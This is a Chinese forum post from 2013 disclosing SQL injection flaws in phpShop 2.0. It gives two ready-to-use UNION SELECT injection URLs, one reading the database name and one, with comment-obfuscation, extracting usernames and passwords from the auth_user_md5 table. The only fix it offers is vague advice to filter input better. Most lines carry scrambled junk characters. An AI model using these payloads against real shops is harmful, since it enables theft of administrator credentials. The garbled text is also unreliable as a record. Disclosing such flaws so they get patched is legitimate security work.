标题 : phpshop 2.0 SQL Injection Vulnerability
4 s5 _7 c# Z! f6 _: m5 O" W
& n6 m# |7 G U* |$ R& L6 C作者 : By onestree
! m! x! i# O, B/ x' Y下载地址 : http://code.google.com/p/phpshop/downloads/list
' L w7 h# Y% E* R9 a. _2 O. y测试地址: windows 7 / ubuntu
3 l1 [8 Y: S& n/ \
4 x7 y2 X9 {) {; }$ x# b$ H 4 D. z& m, M- L& S2 P2 w
SQLi p0c:
4 V2 u5 k2 r+ V& ^+ E, _+ S
4 a6 \" ^0 X ^* @. m==================
2 u4 A5 L# `+ [0 h
9 m0 \: c) N* e. B( i! C& Ahttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'6 N# J& N6 a" h" n( A4 p7 J
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
& i, d8 l7 S7 r) u! b2 g/ e q ! a: A2 G! R" t; }1 r- M
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--$ o, A" D, I9 m O
$ J: V' d( ]' y0 V& ?: K1 P
修复:
# U4 Y1 h: b1 E; P加强过滤
! p7 Y8 i& m% R
e3 t" e7 f4 W' @- z- s8 r' x$ q) ^* e. n/ G) l# n$ a/ v
|
发表于 2013-1-18 18:24:10
收藏
支持
反对